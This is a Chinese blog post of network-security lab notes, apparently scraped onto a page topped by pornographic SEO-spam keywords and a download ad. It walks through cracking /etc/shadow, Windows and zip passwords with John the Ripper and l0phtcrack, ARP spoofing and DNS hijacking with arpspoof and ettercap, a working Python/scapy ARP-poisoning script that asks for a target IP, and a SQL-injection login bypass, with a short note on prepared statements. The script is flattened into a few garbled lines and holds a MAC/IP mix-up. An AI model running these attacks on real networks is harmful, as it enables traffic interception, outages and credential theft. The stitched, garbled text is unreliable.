中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁 > news >正文

內(nèi)容展示類網(wǎng)站seo中文意思是

內(nèi)容展示類網(wǎng)站,seo中文意思是,去哪里找做網(wǎng)站的,自己做網(wǎng)站賣東西🍅 點擊文末小卡片 ,免費獲取網(wǎng)絡(luò)安全全套資料,資料在手,漲薪更快 網(wǎng)絡(luò)安全實驗3 前言Kali 常用指令工具教程 ettercap 基本使用 一、口令破解 John the ripper 破解 linux 密碼l0phtcrack7 破解 windows 密碼John 破解 zip 壓…

🍅?點擊文末小卡片?,免費獲取網(wǎng)絡(luò)安全全套資料,資料在手,漲薪更快

網(wǎng)絡(luò)安全實驗3
  • 前言
  • Kali 常用指令
  • 工具教程
  • ettercap 基本使用
  • 一、口令破解
  • John the ripper 破解 linux 密碼
  • l0phtcrack7 破解 windows 密碼
  • John 破解 zip 壓縮包的密碼
  • 二、ARP 欺騙、DNS 劫持
  • arpspoof 實現(xiàn) ARP 欺騙
  • ettercap 進(jìn)行 DNS 劫持
  • ettercap 進(jìn)行 ARP 欺騙
  • HTTP&HTTPS賬號密碼獲取
  • 三、Python 編寫 arpspoof
  • 環(huán)境準(zhǔn)備
  • ARP 報文結(jié)構(gòu)
  • 編寫代碼
  • 測試腳本
  • 四、SQL注入自己部署的網(wǎng)站
  • 環(huán)境準(zhǔn)備:
  • SQL 注入簡單了解:
  • 開始實戰(zhàn)
  • SQL 注入的預(yù)防方法
  • 為什么預(yù)編譯語句可以防SQL注入?
  • VmVare 問題匯總
  • 橋接模式?jīng)]有網(wǎng)
  • 安全貼士
  • 如何知道自己是否被 ARP欺騙攻擊了?

前言

本人深感網(wǎng)絡(luò)安全實驗有點麻煩,花了一個晚上弄了部分,特此將筆記貢獻(xiàn)造福后人,個人能力有限,還會繼續(xù)更新。。。

匯報題目:15分鐘教你用 Python 寫一個 arpspoof(課件準(zhǔn)備ing,如果弄完后續(xù)補(bǔ)上)

第一次網(wǎng)絡(luò)安全實驗(密碼學(xué))也是我做的,這里先放個自制工具:Java實現(xiàn)密碼學(xué)工具,集成了對稱加密算法DES,AES,IDEA,公開加密算法RSA,ECC,散列算法MD5,SHA1,CRC32,以及RSA,DSA,ECDSA數(shù)字簽名驗證示例。,具體報告有時間上傳一下。。

后續(xù)準(zhǔn)備:將工具教程與實戰(zhàn)模塊分離。。。

Kali 常用指令

切換系統(tǒng)語言:?sudo dpkg-reconfigure locales

獲取 root 權(quán)限:sudo -s,輸入密碼

查看 ip 地址:ipconfig

查看網(wǎng)關(guān)地址:route -n

查找文件:lication xxx

放大命令行字體:ctrl?+?shift?+?+

縮小命令行字體:ctrl?+?-

恢復(fù)初始:ctrl?+?0

工具教程

ettercap 基本使用

左上角搜索?ettercap,選擇?ettercap-graphical?打開軟件

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_局域網(wǎng)

Ettercap 掃描局域網(wǎng)主機(jī)

進(jìn)入 ettercao 后,選擇網(wǎng)卡 eth0,其他的默認(rèn)即可,然后點擊右上角的勾,進(jìn)入操作的主界面。

(由于安裝kali的版本不同,Ettercap 界面可能有所不同,不過操作都是大同小異的)

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_網(wǎng)絡(luò)_02

Ettercap 掃描局域網(wǎng)主機(jī)

進(jìn)入主操作界面后,點擊右上角的三個小點,選擇?Hosts- >?Hosts list,就會出現(xiàn)一個局域網(wǎng)所有主機(jī)的列表,如果 主機(jī)列表為空 或是 有些局域網(wǎng)里的主機(jī)沒有顯示在列表里,那么就可以對整個局域網(wǎng)進(jìn)行主機(jī)掃描,點擊三個小點 ->?Hosts->?Scan for hosts。掃描完成后主機(jī)列表就會刷新了。

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_網(wǎng)絡(luò)_03

Ettercap 偽造網(wǎng)關(guān)欺騙

主機(jī)列表中,選中?網(wǎng)關(guān)IP?點擊?Add to Target 1,選擇?需要攻擊的目標(biāo)主機(jī)IP?點擊?Add to Target 2

這一步主要是欺騙被攻擊的目標(biāo)主機(jī),把 網(wǎng)關(guān)的IP地址偽造成 攻擊者 Mac 地址。讓被攻擊的目標(biāo)主機(jī) 把數(shù)據(jù)發(fā)送到 攻擊者的主機(jī)上。

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_網(wǎng)絡(luò)_04

進(jìn)行 ARP 欺騙

完成上面步驟后,接著點擊小地球選擇?ARP poisoning…?會彈出一個提示框讓你選擇,直接勾選第一個選項,點擊OK,最后一步點擊左上角的三角型按鈕進(jìn)行啟動。

ARP 欺騙啟動后,被攻擊的目標(biāo)主機(jī)數(shù)據(jù)請求就會自動發(fā)送到攻擊者的主機(jī)上來。

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_局域網(wǎng)_05

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_linux_06

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_linux_07

一、口令破解

加密算法,其實就是用明文密碼和一個叫 salt 的東西通過函數(shù)crypt()完成加密。而所謂的密碼域密文也是由三部分組成的,即:$id$salt$encrypted。

  • id?為 1 時,采用 md5 進(jìn)行加密;
  • id?為 5 時,采用 SHA256 進(jìn)行加密;
  • id?為 6 時,采用 SHA512 進(jìn)行加密;

通過?cat /etc/shadow?可以觀察到:

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_網(wǎng)絡(luò)安全技術(shù)pat實驗_08

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_網(wǎng)絡(luò)安全技術(shù)pat實驗_09

John the ripper 破解 linux 密碼

John the ripper 介紹:

  • 四種模式:字典模式,簡單模式,增強(qiáng)模式,外掛模式
  • Kali Linux 上的 John 隨帶的密碼列表。它位于下面這個路徑:
    /usr/share/john/password.lst
  • john --wordlist=/usr/share/john/password.lst [filename]
  • john--show ~/file_to crack

把密碼文件拷貝到用戶目錄下:

cp /etc/shadow /home/yu/yusael
  • 1.

破解密碼文件:

john --wordlist=/usr/share/john/password.lst
  • 1.

查看破解后的密碼文件:

john -show shadow
  • 1.

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_局域網(wǎng)_10

l0phtcrack7 破解 windows 密碼

功能:該工具支持遠(yuǎn)程破解,理論上能破解所有密碼,但對復(fù)雜度比較高的密碼,破解時間很長
使用前提:

  • 登錄了需要破解的計算機(jī)
  • 知道需要破解的計算機(jī)的一個管理員的賬戶,密碼

選擇?Password Auditing Wizard

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_網(wǎng)絡(luò)_11

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_網(wǎng)絡(luò)安全技術(shù)pat實驗_12

選擇要破解的密碼的計算機(jī)操作系統(tǒng),這里我們選擇?Unix-like,點擊?next

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_網(wǎng)絡(luò)安全技術(shù)pat實驗_13

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_網(wǎng)絡(luò)_14

選擇需要獲得密碼的計算機(jī)是本機(jī)器還是遠(yuǎn)程機(jī)器,我們選擇?the local machine?本機(jī)

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_網(wǎng)絡(luò)安全技術(shù)pat實驗_15

選擇是用登錄的賬戶還是其他管理員賬戶,這里我們選擇第一個:登錄的賬戶

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_網(wǎng)絡(luò)_16

選擇密碼爆破方式,我們選擇第一種快速破解,當(dāng)然,也可以選擇其他類型:

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_局域網(wǎng)_17

選擇報告方式,默認(rèn)即可:

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_網(wǎng)絡(luò)安全技術(shù)pat實驗_18

選擇?Run this job immediately?立刻執(zhí)行:

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_網(wǎng)絡(luò)安全技術(shù)pat實驗_19

點擊?finish

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_linux_20

破解結(jié)果:成功破解出簡單的密碼 65535,至于復(fù)雜的含有字母的密碼難以破解(快速模式下)。

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_局域網(wǎng)_21

John 破解 zip 壓縮包的密碼

準(zhǔn)備工具

  1. zip壓縮包帶密碼 1個
  2. kali Linux機(jī)器 1個

操作步驟

首先創(chuàng)建一個?hello.zip?壓縮文件,密碼為?123321,將他放到 Kali Linux 中;

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_python_22

使用?zip2john?命令爆出 hash 文件:zip2john hello.zip >> passwd.txt

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_python_23

然后使用?john?命令,計算 hash 文件:john passwd.txt,成功破解出密碼:123321。

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_linux_24

二、ARP 欺騙、DNS 劫持

arpspoof 實現(xiàn) ARP 欺騙

ARP欺騙:一種中間人攻擊,攻擊者通過毒化受害者的 ARP 緩存,將網(wǎng)關(guān)的 MAC 替換成攻擊者的 MAC ,于是攻擊者的主機(jī)實際上就充當(dāng)了受害主機(jī)的網(wǎng)關(guān),之后攻擊者就可以截獲受害者發(fā)出和接到的數(shù)據(jù)包,從中獲取賬號密碼、銀行卡信息等,也可以實現(xiàn)斷網(wǎng)操作。

注:我們可以通過在終端輸入?arp -a?來查詢 ARP 緩存,為了防治 ARP 欺騙,可以通過?arp -s IP MAC?綁定 IP 和 MAC 生成 靜態(tài) ARP 表項

實驗環(huán)境

  1. 虛擬機(jī) A,使用 kali linux(攻擊者)
  2. 本地主機(jī) B,win10
  3. A 和 B 處于同一局域網(wǎng),這里的虛擬機(jī)需要以橋接的方式進(jìn)行連接!!!

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_網(wǎng)絡(luò)_25

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_局域網(wǎng)_26

橋接和 NAT 的區(qū)別

1、橋接和 NAT 都是虛擬機(jī)的一種通訊模式,都需要一塊網(wǎng)卡,但在橋接模式下虛擬機(jī)和主機(jī)在同一網(wǎng)段,而 NAT 模式下虛擬機(jī)和主機(jī)不在同一網(wǎng)段。

2、橋接網(wǎng)絡(luò)相當(dāng)于虛擬機(jī)和主機(jī)接在同一交換機(jī)上,同時上網(wǎng),虛擬機(jī)對物理機(jī)的 CPU 和網(wǎng)絡(luò)的直接影響較小,但安全性較低。

3、NAT 相當(dāng)于虛擬機(jī)通過物理機(jī)連接網(wǎng)絡(luò),此時物理機(jī)相當(dāng)于一個路由器,虛擬機(jī)等同于申請到一個上網(wǎng)名額,對物理機(jī)的 CPU 和網(wǎng)絡(luò)的直接影響較大,但安全性較高。

實驗步驟

1、主機(jī) B 里?ping www.baidu.com?檢查網(wǎng)絡(luò)

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_linux_27

2、主機(jī) B 里?ipconfig?查詢主機(jī) B 的 IP 地址

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_網(wǎng)絡(luò)_28

3、在 kali 的終端輸入?route -n?查詢當(dāng)前局域網(wǎng)網(wǎng)關(guān),為:192.168.3.1

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_網(wǎng)絡(luò)安全技術(shù)pat實驗_29

4、arp 攻擊指令格式:arpspoof -i [網(wǎng)卡名稱] -t [B的IP] [當(dāng)前局域網(wǎng)網(wǎng)關(guān)]

在 kali 的終端里輸入命令:arpspoof -i eth0 -t 192.168.3.3 192.168.3.1

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_linux_30

5、kali 中輸入指令后,回到主機(jī) B,此時已經(jīng)被ARP攻擊,斷網(wǎng)了。

命令行中ping www.baidu.com?測試網(wǎng)絡(luò)連通發(fā)現(xiàn)請求超時。

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_python_31

ettercap 進(jìn)行 DNS 劫持

ipconfig?查看 Kali Liunx 的 IP 地址,我這里是?192.168.3.21

vi /etc/ettercap/etter.dns?修改 etter.dns 文件,添加兩行:

*	A		192.168.3.21
*	PTR		192.168.3.21
  • 1.
  • 2.

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_網(wǎng)絡(luò)安全技術(shù)pat實驗_32

開啟 apache2 服務(wù):

service apache2 start
  • 1.

打開?ettercap

ettercap -G
  • 1.

點擊掃描,掃描到以后,點擊?Add to Target1Add to Target2

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_網(wǎng)絡(luò)安全技術(shù)pat實驗_33

標(biāo)題欄上點擊三個點,選擇?ARP poisoning...

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_linux_34

選中?Sniff remote connections.

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_python_35

選擇?dns_spoof,即 DNS 劫持攻擊。

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_網(wǎng)絡(luò)安全技術(shù)pat實驗_36

點擊左上角的開始按鈕,此時下面顯示?Starting Unified sniffing...?便開始攻擊了。

此時目標(biāo)機(jī)就連不上“國際互聯(lián)網(wǎng)”(這里的目標(biāo)機(jī)是我的Kali機(jī)子)。

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_網(wǎng)絡(luò)_37

ettercap 進(jìn)行 ARP 欺騙

Ettercap 掃描局域網(wǎng)主機(jī)

進(jìn)入 ettercao 后,選擇網(wǎng)卡 eth0,其他的默認(rèn)即可,然后點擊右上角的勾,進(jìn)入操作的主界面。

(由于安裝kali的版本不同,Ettercap 界面可能有所不同,不過操作都是大同小異的)

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_網(wǎng)絡(luò)_38

Ettercap 掃描局域網(wǎng)主機(jī)

進(jìn)入主操作界面后,點擊右上角的三個小點,選擇?Hosts- >?Hosts list,就會出現(xiàn)一個局域網(wǎng)所有主機(jī)的列表,如果 主機(jī)列表為空 或是 有些局域網(wǎng)里的主機(jī)沒有顯示在列表里,那么就可以對整個局域網(wǎng)進(jìn)行主機(jī)掃描,點擊三個小點 ->?Hosts->?Scan for hosts。掃描完成后主機(jī)列表就會刷新了。

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_linux_39

Ettercap 偽造網(wǎng)關(guān)欺騙

主機(jī)列表中,選中?網(wǎng)關(guān)IP?點擊?Add to Target 1,選擇?需要攻擊的目標(biāo)主機(jī)IP?點擊?Add to Target 2。

這一步主要是欺騙被攻擊的目標(biāo)主機(jī),把 網(wǎng)關(guān)的IP地址偽造成 攻擊者 Mac 地址。讓被攻擊的目標(biāo)主機(jī) 把數(shù)據(jù)發(fā)送到 攻擊者的主機(jī)上。

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_linux_40

進(jìn)行 ARP 欺騙

完成上面步驟后,接著點擊小地球選擇?ARP poisoning…?會彈出一個提示框讓你選擇,直接勾選第一個選項,點擊OK,最后一步點擊左上角的三角型按鈕進(jìn)行啟動。

ARP 欺騙啟動后,被攻擊的目標(biāo)主機(jī)數(shù)據(jù)請求就會自動發(fā)送到攻擊者的主機(jī)上來。

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_linux_41

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_linux_42

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_網(wǎng)絡(luò)_43

此時目標(biāo)主機(jī)已經(jīng)受到攻擊。

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_python_44

通過 路由表 判斷 是否被 ARP 欺騙:ARP -n

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_網(wǎng)絡(luò)安全技術(shù)pat實驗_45

HTTP&HTTPS賬號密碼獲取

先開啟端口轉(zhuǎn)發(fā),保證正常上網(wǎng):echo 1 > /proc/sys/net/ipv4/ip_forward

開始欺騙:arpspoof -i eth0 -t 192.168.3.3 192.168.3.1

用 ettercap 抓取登入帳號,密碼:ettercap -Tq -i eth0


修改中間人攻擊的配置文件:vim /etc/ettercap/etter.conf

三、Python 編寫 arpspoof

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_局域網(wǎng)_46

環(huán)境準(zhǔn)備

虛擬機(jī)的連接方式:

  1. NAT(網(wǎng)絡(luò)地址轉(zhuǎn)換,虛擬機(jī)可以上網(wǎng),但不能和物理機(jī)通信)-----VMnet8
  2. host only(主機(jī)模式,虛擬機(jī)之間回可以通信,與物理機(jī)不能通信)-----VMnet1
  3. bridge?(橋接,答虛擬機(jī)與物理機(jī)在地位上相等,相當(dāng)于與物理機(jī)在同一局域網(wǎng)的物理機(jī))

Kali 如果沒有 pip3 工具,運(yùn)行下面命令安裝 pip3:

apt install python3-pip
  • 1.

安裝 scapy 模塊:

pip3 insatall scapy
  • 1.

ARP 報文結(jié)構(gòu)

以太網(wǎng)報文數(shù)據(jù)

  • 硬件類型:如以太網(wǎng)(0x0001)、分組無線網(wǎng)。
  • 協(xié)議類型:如網(wǎng)際協(xié)議(IP)(0x0800)、IPv6(0x86DD)。
  • 硬件地址長度:每種硬件地址的字節(jié)長度,一般為6(以太網(wǎng))。
  • 協(xié)議地址長度:每種協(xié)議地址的字節(jié)長度,一般為4(IPv4)。

  • 操作碼:1 為 ARP 請求,2 為 ARP 應(yīng)答,3為RARP請求,4為RARP應(yīng)答。
  • 源硬件地址:n個字節(jié),n由硬件地址長度得到,一般為發(fā)送方MAC地址。
  • 源協(xié)議地址:m個字節(jié),m由協(xié)議地址長度得到,一般為發(fā)送方IP地址
  • 目標(biāo)硬件地址:n個字節(jié),n由硬件地址長 度得到,一般為目標(biāo)MAC地址。
  • 目標(biāo)協(xié)議地址:m個字節(jié),m由協(xié)議地址長度得到,一般為目標(biāo)IP地址。

報文格式:對我們來說只需要關(guān)心?操作碼源硬件地址、源協(xié)議地址、目標(biāo)硬件地址、目標(biāo)協(xié)議地址

網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_局域網(wǎng)_47


CMD中:

from scapy.all import *
    # 查看以太網(wǎng)報文
    ls(Ether())

      網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_局域網(wǎng)_48

      # 查看ARP報文
      ls(ARP())

        網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_python_49

        編寫代碼

        #-*- coding:utf-8 -*-from scapy.all import *
        from scapy.layers.l2 import ARP, getmacbyip
        import sys'''
        arp 緩沖表恢復(fù)
        '''
        def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):print("[*] 恢復(fù)ARP緩沖...")send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_ip), count=5)send(ARP(op=2, psrc=target_ip, pdst=gateway_ip,hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac))'''
        進(jìn)行雙向欺騙
        '''
        def attack_target(gateway_ip, gateway_mac, target_ip, target_mac):'''首先使用 scapy 構(gòu)造 ARP包需要: 了解arp報文結(jié)構(gòu)(見筆記)[以太網(wǎng)的首部]默認(rèn)即可;查看默認(rèn)的以太網(wǎng)頭部:>>> ls(Ether())dst        : DestMACField                        = 'ff:ff:ff:ff:ff:ff' (None)src        : SourceMACField                      = '00:0c:29:07:a4:fd' (None)type       : XShortEnumField                     = 36864           (36864)[arp頭部]默認(rèn)即可;需要了解:操作碼	源硬件地址	源協(xié)議地址	目標(biāo)硬件地址	目標(biāo)協(xié)議地址查看ARP報文:>>> ls(ARP())hwtype     : XShortField                         = 1               (1)ptype      : XShortEnumField                     = 2048            (2048)hwlen      : FieldLenField                       = None            (None)plen       : FieldLenField                       = None            (None)op         : ShortEnumField                      = 1               (1) hwsrc      : MultipleTypeField                   = '00:0c:29:07:a4:fd' (None)psrc       : MultipleTypeField                   = '192.168.3.21'  (None)hwdst      : MultipleTypeField                   = '00:00:00:00:00:00' (None)pdst       : MultipleTypeField                   = '0.0.0.0'       (None)我們關(guān)心的是以下幾個屬性:[op]: 操作碼, 默認(rèn)為 11為 ARP請求, 2為 ARP應(yīng)答, 3為 RARP請求, 4為 RARP應(yīng)答RARP —— 逆地址解析協(xié)議, 作用與 ARP 相反, 將 MAC 地址轉(zhuǎn)換為 IP 地址。[hwsrc]: 發(fā)送方 MAC 地址, 用于告訴對方我的 MAC 地址是什么, 默認(rèn)為本機(jī), 可以忽略該屬性hw —— hardware:硬件, src —— source:源, 也就是自己[psrc]: 發(fā)送方 IP 地址, 用于告訴對方我的 IP 地址是什么, 可以用來【偽裝】下面兩個屬性決定報文發(fā)給誰:[hwdst]: 目標(biāo) MAC 地址dst —— destination:目的地[pdst]: 目標(biāo) IP 地址'''# 欺騙目標(biāo)主機(jī), 我是網(wǎng)關(guān)'''發(fā)送給目標(biāo)主機(jī)(target_ip)欺騙它:我的 IP 是 gateway_ip(我是網(wǎng)關(guān))我的 MAC地址 是 hwsrc(默認(rèn)本機(jī))'''poison_target = ARP() # 構(gòu)造 ARP包poison_target.op = 2 # ARP應(yīng)答poison_target.psrc = gateway_ip # 我的 IP 是 gateway_ip(我是網(wǎng)關(guān))poison_target.pdst = target_ip # 目標(biāo) IP 地址poison_target.hwdst = target_mac # 目標(biāo) MAC 地址# 欺騙網(wǎng)關(guān), 我是目標(biāo)主機(jī)'''發(fā)送給網(wǎng)關(guān)(gateway_ip)欺騙它:我的 IP 是 target_ip(我是目標(biāo)主機(jī))我的 MAC地址 是 hwsrc(默認(rèn)本機(jī))'''poison_gateway = ARP() # 構(gòu)造 ARP包poison_gateway.op = 2 # ARP應(yīng)答poison_gateway.psrc = target_ip # 我的 IP 是 target_ip(我是目標(biāo)主機(jī))poison_gateway.pdst = gateway_ip # 目標(biāo) IP地址, 發(fā)送給網(wǎng)關(guān)poison_gateway.hwdst = gateway_ip # 目標(biāo) MAC地址, 發(fā)送給網(wǎng)關(guān)print("[*] 正在進(jìn)行ARP投毒. [CTRL-C 停止]")while True:try:# 不停的發(fā)送 ARP包 send(poison_target)send(poison_gateway)# 休眠一下, 避免太頻繁的欺騙, 影響網(wǎng)絡(luò)time.sleep(2)# 捕獲鍵盤中斷except KeyboardInterrupt:# 進(jìn)行 ARP緩沖修復(fù)restore_target(gateway_ip, gateway_mac, target_ip, target_mac)breakprint("[*] ARP投毒結(jié)束...")def main():# 網(wǎng)卡 (在kali上運(yùn)行該腳本)interface = "eth0"# 網(wǎng)關(guān) gateway_ip = "192.168.3.1"# 目標(biāo)ip# target_ip = "192.168.3.3"target_ip = input("請輸入你想攻擊的IP地址: ")# 設(shè)置網(wǎng)卡conf.iface = interface# 關(guān)閉提示信息conf.verb = 0print("[*] 網(wǎng)卡: %s"%interface )# 獲取網(wǎng)關(guān)MACgateway_mac = getmacbyip(gateway_ip)if gateway_mac is None:print("[!] 獲取網(wǎng)關(guān)MAC失敗. Exiting...")sys.exit(0)else:print("[*] 網(wǎng)關(guān): %s MAC: %s"%(gateway_ip, gateway_mac))# 獲取目標(biāo)主機(jī)MACtarget_mac = getmacbyip(target_ip)if target_mac is None:print("[!] 獲取目標(biāo)主機(jī)MAC失敗. Exiting...")sys.exit(0)else:print("[*] 目標(biāo)主機(jī): %s MAC: %s"%(target_ip, target_mac))attack_target(gateway_ip, gateway_mac, target_ip, target_mac)if __name__ == "__main__":main()

          測試腳本

          Kali 運(yùn)行腳本,windows 作為靶機(jī)。

          查看ip,查看網(wǎng)關(guān)等操作 前面已經(jīng)詳細(xì)列出過,這里不再重復(fù)了,直接開始運(yùn)行腳本,測試。

          輸入命令:Python3 arpspoof.py?運(yùn)行腳本

          網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_python_50

          此時在 windows 上?ping www.baidu.com:成功斷網(wǎng)了。

          網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_局域網(wǎng)_51

          四、SQL注入自己部署的網(wǎng)站

          環(huán)境準(zhǔn)備:

          首先我們在 windows 上部署了自己制作的網(wǎng)站(Spring Boot 搭建),然后開啟了 Tomcat(Java 的 Web 服務(wù)器)。

          SQL 注入簡單了解:

          主要是針對 SQL 語句的漏洞進(jìn)行攻擊,下面舉一個簡單的例子:
          比如網(wǎng)站登錄用戶,基本都是用以下語句去查詢用戶名和密碼,如果正確則登錄成功,否則失敗。
          下句中的 SQL 語句的密碼是我隨便寫的,必定是登錄失敗的。

          SELECT * FROM t_user WHERE username="zhenyu" AND password='xxxxxx';
          • 1.

          但是,如果 SQL 語句是下面這樣呢?

          SELECT * FROM t_user WHERE username="zhenyu" AND password='xxxxxx' OR 1=1;
          • 1.

          不法分子可以通過在密碼中拼接SQL中的關(guān)鍵字來達(dá)到登錄的效果,這就是最簡單的SQL注入原理。

          但其實 SQL 注入的預(yù)防也是十分容易的,后面會寫到。

          開始實戰(zhàn)

          首先在 windows 上運(yùn)行 SpringBoot 項目,服務(wù)器開始運(yùn)行。

          網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_python_52

          在 Kali Liunx 上通過 windows 的 IP 訪問我們的網(wǎng)站:

          網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_python_53

          首先確認(rèn)數(shù)據(jù)庫中正確的密碼:
          正確的用戶名應(yīng)該是:zhenyu
          正確的密碼應(yīng)該是:123456

          輸入用戶名:zhenyu,開始SQL注入:

          輸入密碼?12 or ‘1’ = ‘1’

          網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_局域網(wǎng)_54

          明明密碼不正確,卻可以登錄進(jìn)去!

          網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_局域網(wǎng)_55

          SQL 注入的預(yù)防方法

          其實想要預(yù)防 SQL 注入是非常容易的,尤其是從代碼層面來講,可能只需要改動一行代碼即可。

          以下寫法是具有被SQL注入的風(fēng)險的,

          網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_局域網(wǎng)_56

          只需要改成如下代碼即可,SQL注入就會失效,它的原理是預(yù)編譯語句。

          網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_linux_57

          為什么預(yù)編譯語句可以防SQL注入?

          預(yù)編譯語句之所以能防止注入,是因為它把單引號轉(zhuǎn)義了,變成了 ',這樣一來,就無法截斷SQL語句,進(jìn)而無法拼接SQL語句 基本上沒有辦法注入了。

          關(guān)于預(yù)編譯語句了解即可,大部分的項目開發(fā)中都建議直接使用它,但是很多老項目沒有使用預(yù)編譯語句,就導(dǎo)致了存在SQL注入風(fēng)險的項目依舊很多。

          以上演示的是最簡單的SQL注入,黑客們的智慧是無窮的,通過簡單的SQL語句的搭配即可想出SQL注入這樣的攻擊方案,十分令人驚嘆,未來或許還有更多層出不窮的攻擊會出現(xiàn)。

          VmVare 問題匯總

          橋接模式?jīng)]有網(wǎng)

          問題描述:VMWare安裝之后,虛擬網(wǎng)絡(luò)一直使用默認(rèn)配置:即?VMnet0?為?Bridged?模式,VMnet1?為?Only-Host?模式,VMnet8?為?NAT?模式。點擊了虛擬網(wǎng)絡(luò)編輯器(Virtual Network Editor)?恢復(fù)默認(rèn)設(shè)置后,vMnet0 不見了,并且手動添加選擇橋接模式后會報錯:沒有未橋接的主機(jī)網(wǎng)絡(luò)適配器,無法將網(wǎng)絡(luò)更改為橋接狀態(tài)。

          此問題導(dǎo)致?VMnet0?無法選擇?bridge模式,原因是?還原默認(rèn)設(shè)置?按鈕的 卸載組件-安裝組件 過程刪除了橋接服務(wù),使主機(jī)的網(wǎng)絡(luò)網(wǎng)卡沒能被成功識別。

          解決方案

          搜索?網(wǎng)絡(luò)狀態(tài),并點擊進(jìn)入

          網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_linux_58

          點擊更改適配器選項:

          網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_局域網(wǎng)_59

          右鍵點擊物理網(wǎng)卡,選擇屬性,比如我這里連接的是WIFi:

          網(wǎng)絡(luò)安全技術(shù)pat實驗 網(wǎng)絡(luò)安全 實驗_python_60

          檢查是否安裝并選中了 “VMWare Bridge protocol”,如果沒有請繼續(xù)看下去

